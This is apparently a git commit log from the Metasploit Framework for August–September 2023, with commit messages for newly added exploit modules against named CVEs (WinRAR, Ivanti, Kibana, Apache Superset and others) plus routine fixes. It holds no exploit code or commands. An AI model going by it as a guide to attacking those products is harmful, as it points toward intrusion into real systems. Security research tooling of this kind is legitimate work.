Merge branch 'land-18283' into upstream-master
2023-09-18 17:00:19 -05:00
Metasploit 3646c91d7f automatic module_metadata_base.json update 2023-09-18 16:14:39 -05:00
adfoster-r7 4dd18d814e Land #18377, add support for HELO to smtp_relay auxiliary module in case EHLO is not supported 2023-09-18 21:59:24 +01:00
ErikWynter e5c922619b use res for check response code instead of res.inspect 2023-09-18 19:33:07 +03:00
adfoster-r7 d71883f55a Fix broken test suite when running in small console window 2023-09-18 16:40:47 +01:00
ErikWynter 75d2d20a04 check response code instead of text for downgrade to HELO 2023-09-18 17:25:04 +03:00
dwelch-r7 0fc88a8050 Land #18378, Remove left behind debug logging from prometheus exporter 2023-09-18 14:01:27 +01:00
adfoster-r7 8172f30204 Remove left behind debug logging from prometheus exporter 2023-09-18 13:47:36 +01:00
Metasploit 4a1ebe1a56 automatic module_metadata_base.json update 2023-09-18 07:20:12 -05:00
dwelch-r7 c1a44c8b7f Land #18359, Forge ticket fix 2023-09-18 13:05:25 +01:00
h00die 8d79d5afbd fix references 2023-09-18 06:56:18 -04:00
Metasploit ea3b8e91d9 automatic module_metadata_base.json update 2023-09-18 05:07:06 -05:00
cgranleese-r7 23dc1a487d Land #18321, Add Ivanti Avalanche MDM Buffer Overflow Exploit (CVE-2023-32560) 2023-09-18 10:43:45 +01:00
cgranleese-r7 2ed8b93e11 Land #18370, Fix msfrpc hanging when updating saved command history 2023-09-18 10:38:45 +01:00
ErikWynter 47bb57a1fe add support for HELO in case EHLO is not supported 2023-09-18 12:31:13 +03:00
Ismail Dawoodjee f9cdfef304 Move module and documentation from multi/http to linux/http
* Update documentation scenarios for Docker on Debian 10 and Kali Linux 6.4
* Slightly modify the documentation scenario for Docker on Windows 10
2023-09-17 22:42:26 +08:00
h00die dd947d49cc fix related modules references 2023-09-15 16:42:03 -04:00
h00die cd183194fd fix related modules references 2023-09-15 16:40:22 -04:00
h00die 13e7f6cc27 fix related modules references 2023-09-15 16:35:55 -04:00
h00die e34ed10eca superset rce more stable 2023-09-15 16:29:05 -04:00
joev 1d51514730 Add spec for format without comment support. 2023-09-15 12:35:45 -06:00
h00die a8da47e73c still working on resetting values 2023-09-15 13:32:24 -04:00
eu ffb34b05ef Adherence to code review 2023-09-15 16:55:05 +02:00
Ismail Dawoodjee d12b1778e5 Merge branch 'rapid7:master' into apache_airflow_dag_rce 2023-09-15 22:06:43 +08:00
Simon Janusz 1378bfbfc7 Land #18294, pick up netifaces updates, improve error catching 2023-09-15 13:04:26 +01:00
adfoster-r7 a60e048e78 Fix msfrpc hanging when updating saved command history 2023-09-15 12:42:40 +01:00
Dean Welch 09c757513f Correct Msf::ValidationError namespacing 2023-09-15 12:23:49 +01:00
cgranleese-r7 ba9f879f64 Land #18369, Fix opt address local crash when ipaddr is nil 2023-09-15 11:09:43 +01:00
Carmix 1efb3f733f solves #18371 2023-09-15 11:36:15 +02:00
Metasploit 85cf00e68c automatic module_metadata_base.json update 2023-09-14 18:26:16 -05:00
Jack Heysel 46832abd49 Land #18358, Add a Thrift RPC client
This PR adds a Thrift RPC client and updates
two modules to make use of the new addition.
2023-09-14 19:01:13 -04:00
adfoster-r7 871e1f401b Fix OptAddressLocal crash when IPAddr is nil 2023-09-14 23:10:20 +01:00
Spencer McIntyre 0368b23af9 Add some basic specs for the client too 2023-09-14 17:45:09 -04:00
Spencer McIntyre bf9ef45c45 Add some specs for thrift data types 2023-09-14 17:16:32 -04:00
adfoster-r7 c558dae400 Land #18361, Adds new search keywords to msfconsole 2023-09-14 19:48:41 +01:00
h00die-gr3y 21cab0eccd updated documentation 2023-09-14 18:38:34 +00:00
h00die 0c418fdf65 still working on resetting values 2023-09-14 14:28:29 -04:00
h00die-gr3y 784f3118f0 third release module and documentation 2023-09-14 17:59:59 +00:00
h00die 619a46d450 working hashes for apache superset rce 2023-09-14 13:21:01 -04:00
Metasploit 126e6b6e7a Bump version of framework to 6.3.35 2023-09-14 12:10:09 -05:00
Ege Balcı cf4757a6cb Update installation steps. 2023-09-14 18:51:48 +02:00
Ege Balcı 9fbfe63b2f Update documentation/modules/exploit/windows/misc/ivanti_avalanche_mdm_bof.md
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2023-09-14 16:39:15 +00:00
adfoster-r7 1b29c48193 Land #18362, Fix msfrpc hanging forever if rsock pair doesnt connect 2023-09-14 15:56:58 +01:00
Heyder Andrade 766766be78 Apply suggestions from code review
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2023-09-14 16:13:10 +02:00
eu 8627616404 Added scenario for a non-vulnrable version 2023-09-14 15:56:35 +02:00
h00die-gr3y 094685fa93 second release module 2023-09-14 13:12:33 +00:00
eu 54a7b55eb4 Fix code style 2023-09-14 15:05:41 +02:00
Metasploit c4396f2c6f automatic module_metadata_base.json update 2023-09-14 04:33:31 -05:00
Simon Janusz 8b56dc0117 Land #18250, CVE-2023-28252: Windows CLFS Driver Privilege Escalation 2023-09-14 10:18:29 +01:00
h00die-gr3y 4bb465bcee initial release module 2023-09-13 20:59:53 +00:00
h00die 686d704b37 superset rce wip 2023-09-13 15:26:29 -04:00
joev 0b73e4ca7a Add support to msfvenom for "-f octal". 2023-09-13 12:17:22 -06:00
adfoster-r7 bc2fdba422 Fix msfrpc hanging forever if rsock pair doesnt connect 2023-09-13 17:41:00 +01:00
Ismail Dawoodjee 930063fe91 Merge branch 'rapid7:master' into apache_airflow_dag_rce 2023-09-13 23:51:47 +08:00
cgranleese-r7 4bff7ddea1 Adds new search keywords to msfconsole 2023-09-13 16:41:05 +01:00
eu 401c775336 Rename module 2023-09-13 17:19:42 +02:00
eu fc4b47cddd Added documentation 2023-09-13 17:18:18 +02:00
cgranleese-r7 814484cd29 Land #18357, Add additional error reporting to integration tests 2023-09-13 15:02:57 +01:00
Metasploit 95b882bb7c automatic module_metadata_base.json update 2023-09-13 04:30:49 -05:00
cgranleese-r7 e82bff37e1 Land #18330, Ivanti Sentry MICSLogService Auth Bypass resulting in RCE (CVE-2023-38035) 2023-09-13 10:15:59 +01:00
Ismail Dawoodjee 008701f431 Apply suggestions from code review
Co-authored-by: Brendan <bwatters@rapid7.com>
2023-09-13 15:04:52 +08:00
Ashley Donaldson 5c93b3880a Don't add extra PACs for silver tickets 2023-09-13 15:41:09 +10:00
Ashley Donaldson 483e8175ca Update unit tests 2023-09-13 14:11:18 +10:00
Ismail Dawoodjee 78684dce8d Merge branch 'rapid7:master' into apache_airflow_dag_rce 2023-09-13 09:43:35 +08:00
Metasploit 6a84cc8a57 automatic module_metadata_base.json update 2023-09-12 18:27:42 -05:00
Spencer McIntyre 28c4902f4a Land #18180, Flask unsign library, related modules
Apache Supserset Priv Esc (CVE-2023-27524) and Flask unsign Library
2023-09-12 19:02:30 -04:00
adfoster-r7 30e66c43a4 Land #18343, add support for configurable DNS resolver to metasploit-framework 2023-09-12 22:56:37 +01:00
Spencer McIntyre c1cabdf099 Process escape sequences in the wordlist 2023-09-12 16:49:38 -04:00
Jack Heysel b83a49e573 Thanks to Spencer improved execute_command method 2023-09-12 15:14:10 -04:00
Spencer McIntyre 887740032c Add some lib docs 2023-09-12 14:00:34 -04:00
adfoster-r7 e070ba28da Add additional error reporting to integration tests 2023-09-12 17:32:18 +01:00
Spencer McIntyre 8e8b8ad191 Update nimbus_gettopologyhistory_cmd_exec 2023-09-12 12:21:10 -04:00
Spencer McIntyre 187cca848e Replace the binray blobs 2023-09-12 12:21:10 -04:00
Spencer McIntyre 2370171d5f Add more thrift types and methods for creating them 2023-09-12 12:21:03 -04:00
Dean Welch 5713b74cd4 Use constants for LDAP::Auth conditional 2023-09-12 14:41:58 +01:00
Ashley Donaldson 6b8fe05865 Add new PAC types required by DCs for accepting TGTs as valid 2023-09-12 17:19:10 +10:00
h00die 325910b080 update LICENSE with flask wordlist 2023-09-11 15:18:16 -04:00
Spencer McIntyre ba84c0484c Update the Nimbus module to use the Thrift client 2023-09-11 14:42:54 -04:00
Spencer McIntyre fbf95ecd92 Add and use a Thrift client object 2023-09-11 14:37:38 -04:00
h00die 94657d317b another round of review comments 2023-09-11 14:29:20 -04:00
Zach Goldman a13d45ec2d add unit test 2023-09-11 12:14:26 -05:00
Zach Goldman 615aa8dff5 pick up netifaces updates, improve error catching 2023-09-11 12:12:27 -05:00
Jack Heysel e105a56bda Merge branch 'clfs-driver-priv-esc' of github.com:jheysel-r7/metasploit-framework into clfs-driver-priv-esc 2023-09-11 13:11:59 -04:00
Jack Heysel b80f9a84e4 Updated check method and reliability 2023-09-11 13:10:57 -04:00
Dean Welch 586f27f44a Fix issue with username generation always adding domain 2023-09-11 16:35:31 +01:00
Dean Welch 1af852b240 Add remote ldap specs 2023-09-11 16:33:01 +01:00
Dean Welch 7a06ad8d5d Add ldap login scanner specs 2023-09-11 16:33:01 +01:00
Dean Welch 80757fc717 Add missing require 2023-09-11 16:33:01 +01:00
Dean Welch fc89c9939a Add LDAP login scanner 2023-09-11 16:33:01 +01:00
Dean Welch 8f013d7aef Add ldap login scanner module 2023-09-11 16:33:01 +01:00
Simon Janusz 0fcba5ee17 Land #17970, Fix #17969 Assign empty hash to variable status 2023-09-11 16:12:23 +01:00
cgranleese-r7 5ea6340f7e Land #18356, Update docker dependency versions 2023-09-11 16:11:37 +01:00
h00die 2ed001ced2 light review changes 2023-09-11 10:33:43 -04:00
h00die 235c142274 Merge remote-tracking branch 'origin/flask_unsign' into flask_unsign 2023-09-11 10:27:00 -04:00
Simon Janusz d91a9638fc Use empty hash instead of nil for nessus status 2023-09-11 15:20:18 +01:00
adfoster-r7 7aa54c5907 Update docker depdendency versions 2023-09-11 15:15:52 +01:00
cgranleese-r7 041bd3edc3 Land #18349, Add Meterpreter compatibility matrix generation 2023-09-11 12:24:58 +01:00
adfoster-r7 901938c0f1 Add Meterpreter compatibility matrix generation 2023-09-11 12:04:18 +01:00
cgranleese-r7 1e8866f8bd Land #18354, Show the tip while MSF is loading 2023-09-11 11:50:53 +01:00
h00die 15c6f0d9d3 Merge pull request #24 from zeroSteiner/h00die/flask_unsign
H00die/flask unsign
2023-09-08 20:18:12 -04:00
Metasploit 5a9eca74e6 automatic module_metadata_base.json update 2023-09-08 16:32:40 -05:00
Spencer McIntyre f1aea836f3 Land #18273, Add VMware vRealize Log Insight RCE
Add VMware vRealize Log Insight unauthenticated RCE exploit
2023-09-08 17:17:23 -04:00
Spencer McIntyre 21dde19511 Make some final tweaks
Change strings to reference `VMware` using the proper case. Don't
include CmdStager (because it's unnecessary). Set PrependFork to fix
shell payloads. Move CamelCase options to advanced.
2023-09-08 16:55:42 -04:00
Metasploit c7477ad786 automatic module_metadata_base.json update 2023-09-08 13:17:02 -05:00
bwatters fdae4953eb Land #18290, Prometheus API & Prometheus Node Exporter Interrogator
Merge branch 'land-18290' into upstream-master
2023-09-08 12:55:30 -05:00
Jack Heysel 96a6baa500 Land #17474, Add Windows 11 support for Capcom LPE
This PR adds support to the Capcom.sys LPE for Windows 11 21H1
2023-09-08 13:43:07 -04:00
jheysel-r7 0111e55006 Update modules/exploits/windows/local/capcom_sys_exec.rb 2023-09-08 13:05:44 -04:00
Metasploit fee5cc0497 automatic module_metadata_base.json update 2023-09-08 11:25:50 -05:00
Simon Janusz 5e8d00914f Land #18327, fix #18326 (ssl_version module bug when selecting specific ssl version) 2023-09-08 17:11:07 +01:00
Metasploit 6f6a4795f3 automatic module_metadata_base.json update 2023-09-08 11:06:04 -05:00
Simon Janusz 57f3b8a352 Land #18350, Add opentsdb_key_cmd_injection exploit module and docs 2023-09-08 16:50:46 +01:00
Spencer McIntyre 11c09b9f27 Show the tip while MSF is loading
Give the users something to read while things are loading instead of
waiting until everything is ready to go.
2023-09-08 11:33:29 -04:00
Simon Janusz 18103b032d Add docs for opentsdb_key_cmd_injection 2023-09-08 16:08:18 +01:00
Spencer McIntyre 40716cb28b Make the separator configurable 2023-09-08 08:56:45 -04:00
Metasploit 6e1753d435 automatic module_metadata_base.json update 2023-09-08 06:05:09 -05:00
Simon Janusz 7302394ffa Land #18316, Kibana Timelion Prototype Pollution RCE (CVE-2019-7609) 2023-09-08 11:50:47 +01:00
Simon Janusz fb4a7186a5 Land #18262, Makes some adjustments to the favorites command 2023-09-08 11:34:08 +01:00
Metasploit f6320cfd33 automatic module_metadata_base.json update 2023-09-08 05:11:37 -05:00
Christophe De La Fuente a33f03d100 Land #18302, Sonicwall rce CVE-2023-34124 2023-09-08 11:48:07 +02:00
Simon Janusz 740f026cbf Land #18270, Improve tab completion for set command 2023-09-08 10:08:39 +01:00
Metasploit 4b5335e3c6 automatic module_metadata_base.json update 2023-09-07 16:15:09 -05:00
bwatters 946794c3f8 Land #18341, add CVE-2023-38831 for Winrar 6.22
Merge branch 'land-18341' into upstream-master
2023-09-07 15:59:36 -05:00
Metasploit 3ebd27b93f automatic module_metadata_base.json update 2023-09-07 15:45:23 -05:00
Jack Heysel ef4a9dd239 Land #18329, Add LG Simple Editor RCE module
This PR adds an unauth RCE module for LG Simple Editor
2023-09-07 16:21:10 -04:00
Spencer McIntyre 6afde75c59 Print the connection string 2023-09-07 16:20:03 -04:00
Spencer McIntyre 2ded62a783 Update the module with validation functionality 2023-09-07 16:20:03 -04:00
Spencer McIntyre 143e1c82b5 Add validation functionality to FlaskUnsign 2023-09-07 16:19:58 -04:00
xaitax adae68d288 Update winrar_cve_2023_38831.rb 2023-09-07 22:01:49 +02:00
Alex 4d2277faa3 Update modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2023-09-07 21:46:24 +02:00
Alex 51d80b626f Update modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2023-09-07 21:46:16 +02:00
Alex 8b40f56fd7 Update modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2023-09-07 21:46:09 +02:00
Alex cc78156b8c Update modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2023-09-07 21:46:00 +02:00
xaitax 28785eb8a1 Remove payload space 2023-09-07 19:59:31 +02:00
Ege Balcı 2cda3fab50 Update options 2023-09-07 19:50:10 +02:00
Ege Balcı 5b6ee0cfaf Add extra sleep during PakUpgrade for stabilization 2023-09-07 19:49:57 +02:00
Ege Balcı 9a5dd4e4e5 Refactor thrift usage, add extra SRVHOST check, switch to decoded mf_file 2023-09-07 19:29:23 +02:00
Metasploit 030fc99331 Bump version of framework to 6.3.34 2023-09-07 12:05:08 -05:00
Ege Balcı e286c96dee Update modules/exploits/windows/http/lg_simple_editor_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2023-09-07 17:00:17 +00:00
Ege Balcı 3509193ae8 Update modules/exploits/windows/http/lg_simple_editor_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2023-09-07 17:00:10 +00:00
Jack Heysel 15908b9721 Merge branch 'ivanti-sentry-misc-log-service' of github.com:jheysel-r7/metasploit-framework into ivanti-sentry-misc-log-service 2023-09-07 12:40:26 -04:00
Jack Heysel fd6a2fa64a Updated docs 2023-09-07 12:19:11 -04:00
jheysel-r7 7944df2b87 Apply suggestions from code review
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2023-09-07 11:46:24 -04:00
Metasploit 9d1b08f346 automatic module_metadata_base.json update 2023-09-07 10:26:52 -05:00
Simon Janusz 26cb5c7241 Land #18322, Elasticsearch Memory Disclosure (CVE-2021-22145) 2023-09-07 16:11:40 +01:00
ErikWynter 7cabe14461 add opentsdb_key_cmd_injection exploit module 2023-09-07 17:29:16 +03:00
eu 6a260f60e0 Initial commit 2023-09-07 13:53:42 +02:00
Ron Bowes b12fe743d0 Resolve PR comments 2023-09-06 14:11:29 -07:00
h00die fa4fabf47b review comments 2023-09-06 16:51:57 -04:00
Jack Heysel 3ae658285b Updated socat tcp cache size 2023-09-06 15:52:56 -04:00
Jack Heysel cf62d3fa78 rubocop 2023-09-06 15:47:54 -04:00
Jack Heysel 31d5f8e128 Responded to comments 2023-09-06 15:40:43 -04:00
h00die 213b9f9589 Merge remote-tracking branch 'upstream/master' into flask_unsign 2023-09-06 15:39:37 -04:00
Metasploit 8eb8cbfde9 automatic module_metadata_base.json update 2023-09-06 13:29:39 -05:00
Jack Heysel 13174382d9 Land #18179, improve windows checkvm post module 2023-09-06 14:07:50 -04:00
Metasploit 875320c1aa automatic module_metadata_base.json update 2023-09-06 11:07:24 -05:00
Jack Heysel 4ade16752a Land #18190, improve linux checkvm post module 2023-09-06 11:50:50 -04:00
Metasploit 0f5c726c1f automatic module_metadata_base.json update 2023-09-06 09:59:44 -05:00
cgranleese-r7 e892a1e853 Fixes issue with module fullname matching as substring of other modules 2023-09-06 15:57:59 +01:00
bwatters 53b7f1ba07 Land #18286, roundcube arbitrary file read
Merge branch 'land-18286' into upstream-master
2023-09-06 09:43:38 -05:00
bwatters 48dcb2440b Delete repeat 2023-09-06 08:43:56 -05:00
bwatters 255bbf22d6 Add section on not using fail_with in check methods 2023-09-06 08:39:08 -05:00
Metasploit 55cf80cab6 automatic module_metadata_base.json update 2023-09-05 17:13:03 -05:00
Jack Heysel 482fdefb2c Land #18313, SolarView Compact unauth RCE module
This PR adds a SolarView Compact unauth RCE module.
2023-09-05 17:49:28 -04:00
jheysel-r7 03ccb3cce0 Apply grammatical suggestions from code review 2023-09-05 17:06:01 -04:00
bwatters 91e7af4370 Added check, some stealth, and cleaned code 2023-09-05 14:29:13 -05:00
Spencer McIntyre 6b20c19964 Update rex-socket gem to 0.1.53
Includes changes from:
* rapid7/rex-socket#43
2023-09-05 09:41:08 -04:00
Metasploit 2e75abac77 automatic module_metadata_base.json update 2023-09-05 08:26:18 -05:00
cgranleese-r7 55d0f29e54 Land #18281, Detection module for CVE-2023-21554 - QueueJumper 2023-09-05 14:03:30 +01:00
bka-dev a027daaa0d corrected another minor typo 2023-09-05 14:28:47 +02:00
bka-dev d3698a8b46 added known vulnerable systems 2023-09-05 13:58:36 +02:00
Bastian Kanbach 4b8f5dc41c Update modules/auxiliary/scanner/msmq/cve_2023_21554_queuejumper.rb
Corrected typo

Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2023-09-05 13:15:36 +02:00
xaitax ac91516cc9 Update winrar_cve_2023_38831.rb 2023-09-04 20:25:20 +02:00
xaitax b0fa4cc266 Update winrar_cve_2023_38831.rb 2023-09-04 19:54:43 +02:00
xaitax d5f355d8de WinRAR 6.22 (CVE-2023-38831) 2023-09-04 18:56:22 +02:00
Ege Balcı 4088276b36 Adjust option name 2023-09-04 16:46:14 +02:00
Ashley Donaldson f27439760d Update mock for unit tests 2023-09-04 10:47:06 +10:00
Ashley Donaldson 8992c955b4 Prioritise kerberos scanning over RC4, to get more easily crackable hash. Fall back to defaults. 2023-09-04 10:12:57 +10:00
h00die c6a2652861 review comments 2023-09-01 20:34:35 -04:00
h00die fb9f3bd13f review comments 2023-09-01 20:14:41 -04:00
Ege Balcı c2fc371721 Update modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2023-09-01 01:59:03 +00:00
Ege Balcı 9044588971 Update modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2023-09-01 01:53:40 +00:00
Ege Balcı f96ca4429a Update modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2023-09-01 01:53:31 +00:00
Ege Balcı a552132fc3 Update documentation/modules/exploit/windows/misc/ivanti_avalanche_mdm_bof.md
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2023-09-01 01:53:17 +00:00
Ege Balcı 48cb2db70b Update scenario 2023-09-01 03:48:08 +02:00
Ege Balcı 20a22f1baf Fix check, randomize JSP name, ditch backup 2023-09-01 03:46:58 +02:00
Ege Balcı 757e942ac9 Update modules/exploits/windows/http/lg_simple_editor_rce.rb
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2023-09-01 01:16:32 +00:00
Metasploit 90cf371376 Bump version of framework to 6.3.33 2023-08-31 12:06:37 -05:00
Jeffrey Martin 1d8d76f431 update Pro version docs for 4.22.2 release 2023-08-31 11:40:17 -05:00
Metasploit 0f3385e5cf automatic module_metadata_base.json update 2023-08-31 11:25:30 -05:00
Jack Heysel 73de437eca Updated cache size 2023-08-31 12:22:30 -04:00
Jack Heysel e5f2ebff19 Fix copy pasta error 2023-08-31 12:14:24 -04:00
Christophe De La Fuente 6a674f53ff Land #18309, Stream LDAP query results 2023-08-31 18:09:45 +02:00
Jack Heysel 5c12a3e6f4 Remove unused default options 2023-08-31 02:47:40 -04:00
Jack Heysel 3e58183291 updated payloads_spec 2023-08-31 02:43:12 -04:00
Jack Heysel 3a7ef46d17 Remove platform linux 2023-08-31 02:32:21 -04:00
Jack Heysel 273d8ec0bc Setting cache size to 88 to apease CI 2023-08-31 02:27:03 -04:00
Jack Heysel 7b8debd58f Tidy up, last minute rubocop 2023-08-31 02:17:35 -04:00
Jack Heysel 9779b1eeae Lexmark Device Embedded Web Server RCE (CVE-2023-26068) 2023-08-30 20:30:14 -04:00
RadioLogic e026791905 Added catch all warning to remove added groups 2023-08-30 12:15:00 -04:00
jheysel-r7 ef55c4f2c1 Update documentation/modules/exploit/windows/local/cve_2023_28252_clfs_driver.md 2023-08-30 12:11:37 -04:00
jheysel-r7 68090d0406 Update modules/exploits/linux/http/ivanti_sentry_misc_log_service.rb
Co-authored-by: wvu <4551878+wvu@users.noreply.github.com>
2023-08-30 11:46:44 -04:00
Metasploit b2e7e93312 automatic module_metadata_base.json update 2023-08-30 08:14:24 -05:00
Christophe De La Fuente 8217745a85 Land #18257, Apache nifi h2 rce (CVE-2023-34468) 2023-08-30 13:37:37 +02:00
bwatters ccba494e61 Exploit working, still needs to be cleaned up 2023-08-29 18:01:44 -05:00
Jack Heysel fe8cb3398f Another docs update 2023-08-29 17:33:51 -04:00
Jack Heysel 47f621106c Updated docs 2023-08-29 17:11:33 -04:00
Jack Heysel a3a7454f74 Ivanti Sentry MICSLogService Auth Bypass resulting in RCE (CVE-2023-38035) 2023-08-29 15:24:04 -04:00
Jack Heysel b326832bcf Renamed module, rubocop 2023-08-29 13:21:13 -04:00
Ege Balcı 32f9357f7a Update side effects 2023-08-29 18:08:11 +02:00
Ege Balcı 1d9c7fde77 Add LG Simple Editor Unauthenticated RCE (CVE-2023-40498) Exploit 2023-08-29 17:58:43 +02:00
Ege Balcı 44dd8439df Add low version guard and token check 2023-08-29 17:43:21 +02:00
Jack Heysel efd9a69b35 Module returns a Metepreter session 2023-08-29 02:00:35 -04:00
h00die db9bf5f6cd now down to 10 shells! 2023-08-28 17:42:35 -04:00
h00die f467e0747a review comments 2023-08-28 17:39:02 -04:00
h00die a4bde1157c fix #18326 2023-08-28 16:49:31 -04:00
Metasploit 28ba19a12f automatic module_metadata_base.json update 2023-08-28 04:46:15 -05:00
Christophe De La Fuente 7fa2586e34 Land #18247, Netgear NMS RCE CVE-2023-38096/8 2023-08-28 11:23:08 +02:00
h00die-gr3y 77a1bbef79 Second release module and documentation 2023-08-28 07:49:40 +00:00
Ege Balcı eaeb2024d3 Merge branch 'master' into vmware_vrli_rce
Merge for ThriftMessageType
2023-08-26 22:42:25 +02:00
Ege Balcı 65402ab3ab Update stability to CRASH_SAFE 2023-08-26 18:55:31 +02:00
Ege Balcı 047a1c9e03 Remove TRA (Tenable vuln ID) 2023-08-26 18:45:42 +02:00
Ege Balcı ed01948ffe Randomize buffer + use make_nops 2023-08-26 18:43:07 +02:00
Ege Balcı 721d5cfaa1 Update modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2023-08-26 16:27:21 +00:00
Ege Balcı 06ab901397 Update modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2023-08-26 16:27:12 +00:00
Ege Balcı 08de344f81 Update modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2023-08-26 16:26:54 +00:00
Ege Balcı 8ba2343164 Update documentation/modules/exploit/windows/misc/ivanti_avalanche_mdm_bof.md
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2023-08-26 16:26:39 +00:00
bwatters c69e983b30 Add module to create directory structures and upload/run exploit 2023-08-25 15:41:25 -05:00
Ege Balcı b10d677308 Doc update. 2023-08-25 21:18:48 +02:00
h00die 772978964e elastic memory disclosure 2023-08-25 13:28:17 -04:00
Ege Balcı a971867ca6 Add Ivanti Avalanche MDM Buffer Overflow Exploit (CVE-2023-32560) 2023-08-25 19:26:06 +02:00
cudalac 926bdd03c4 roundcube arbitrary file read 2023-08-25 08:59:53 -04:00
Metasploit 6fa6919f2c automatic module_metadata_base.json update 2023-08-24 17:59:18 -05:00
Spencer McIntyre b830587a60 Land #18310, elasticsearch enum module enhancements
elasticsearch enum module enhancements
2023-08-24 18:31:48 -04:00
h00die 67768567ac review comments 2023-08-24 17:24:20 -04:00
h00die b529814563 fix sideeffects/reliability 2023-08-24 16:28:05 -04:00
h00die 43401dd872 review comments 2023-08-24 16:23:41 -04:00
h00die 5382eb22d1 kibana exploit 2023-08-24 16:08:08 -04:00
RadioLogic 8497699d53 Moved creation of new groups to its own function 2023-08-24 13:26:15 -04:00
RadioLogic 1e0ec1b0e1 Minimalize groupadd checks
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2023-08-24 13:14:05 -04:00
Metasploit ecaa038afe Bump version of framework to 6.3.32 2023-08-24 12:08:09 -05:00
Ege Balcı 0fe335aff2 Update documentation/modules/exploit/windows/http/netgear_nms_rce.md
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2023-08-24 16:10:30 +00:00
Metasploit b0446cee14 automatic module_metadata_base.json update 2023-08-24 05:07:22 -05:00
Christophe De La Fuente a037d16b66 Land #18233, Chamilo unauthenticed RCE [CVE-2023-34960] 2023-08-24 11:49:40 +02:00
bwatters c05582267c Placeholder for VE-2023-36874 2023-08-23 20:13:03 -05:00
h00die 3879fbed95 elasticsearch enum module enhancements 2023-08-23 18:09:28 -04:00
h00die-gr3y 3612030cee first release of module 2023-08-23 22:07:58 +00:00
h00die 79a4cfa9cb elasticsearch enum module enhancements 2023-08-23 18:07:52 -04:00
h00die 8796d5e2d4 elasticsearch enum module enhancements 2023-08-23 18:06:41 -04:00
Metasploit 4062916a84 automatic module_metadata_base.json update 2023-08-23 17:00:19 -05:00
Spencer McIntyre 3c6f5419f2 Land #18214, Change fetch payload default options
Change default command to certutil for Windows HTTP Fetch and default…
2023-08-23 17:45:10 -04:00
adfoster-r7 e760e781df Land #18307, Fix exploit/linux typos in Subrion RCE docs 2023-08-23 20:37:46 +01:00
adfoster-r7 3b1ba78536 Land #18306, Fix an error in ThriftMessageType 2023-08-23 20:36:33 +01:00
h00die 36327e1ff4 elasticsearch enum module enhancements 2023-08-23 15:19:06 -04:00
bwatters 71ded31aae Add check to make sure that FETCH_SRVHOST is set properly for bind payloads, too. 2023-08-23 12:50:25 -05:00
RadioLogic 55c22f9848 Added some protective statements 2023-08-23 13:44:30 -04:00
RadioLogic 48acd804da Added PasswordHashType advanced option 2023-08-23 13:37:08 -04:00
RadioLogic b464b9119c Added missing newline to manual writes 2023-08-23 13:21:53 -04:00
RadioLogic 93624cca53 Moved groups section to its own function 2023-08-23 13:18:01 -04:00
RadioLogic 1bff275991 Moved manual group write to its own function 2023-08-23 13:01:22 -04:00
RadioLogic 0ae003f55b Moved os_platform to its own function 2023-08-23 12:48:01 -04:00
RadioLogic 86885e8e58 Replaced echo command in manual with append_file 2023-08-23 12:27:39 -04:00
RadioLogic 0c005a50c9 Moved creating groups towards the top implementing it only once 2023-08-23 12:23:59 -04:00
adfoster-r7 b92b8e91a4 Land #18308, Fix lines in SmarterMail RCE docs for linting with msftidy_docs 2023-08-23 17:18:59 +01:00
RadioLogic 85fc0f48e7 Made wrapper to command_exists? to ensure safe run 2023-08-23 11:51:14 -04:00
Ismail Dawoodjee c216c5a184 Fix lines in SmarterMail RCE docs for linting with msftidy_docs 2023-08-23 23:07:07 +08:00
Ismail Dawoodjee 94b7e77d11 Fix exploit/linux typos in Subrion RCE docs 2023-08-23 22:44:49 +08:00
Spencer McIntyre d870f4bebe Fix an error in ThriftMessageType 2023-08-23 10:33:27 -04:00
Metasploit afda825dc9 automatic module_metadata_base.json update 2023-08-23 09:24:12 -05:00
Ismail Dawoodjee 009721b3c7 Merge branch 'rapid7:master' into apache_airflow_dag_rce 2023-08-23 22:13:20 +08:00
Christophe De La Fuente bf1b5ffaa3 Land #18272, Bug fix for ColdFusion RCE module - CVE-2023-26360 2023-08-23 16:05:33 +02:00
Spencer McIntyre 091c07258b Land #18298, Sort addresses
Ensure datastore network adapter names are consistently resolved
2023-08-23 09:08:03 -04:00
h00die-gr3y f64b67968f Final minor updates 2023-08-23 11:38:07 +00:00
RadioLogic 432cdce773 Fixed condition logic to invalid groups 2023-08-22 12:53:09 -04:00
H00die.Gr3y 1db284dcaa Apply suggestions from code review
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
